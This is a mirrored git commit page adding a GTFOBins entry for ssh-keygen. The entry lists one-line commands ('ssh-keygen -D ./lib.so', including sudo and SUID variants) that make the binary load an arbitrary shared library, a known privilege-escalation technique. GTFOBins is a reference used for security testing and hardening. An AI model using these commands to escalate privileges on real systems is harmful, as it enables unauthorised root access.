mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add ssh-keygen
This commit is contained in:
parent
af562d63cb
commit
2db67eefb9
12
_gtfobins/ssh-keygen.md
Normal file
12
_gtfobins/ssh-keygen.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
library-load:
|
||||||
|
- description: |
|
||||||
|
code: ssh-keygen -D ./lib.so
|
||||||
|
sudo:
|
||||||
|
- description: |
|
||||||
|
code: sudo ssh-keygen -D ./lib.so
|
||||||
|
suid:
|
||||||
|
- description: |
|
||||||
|
code: ./ssh-keygen -D ./lib.so
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user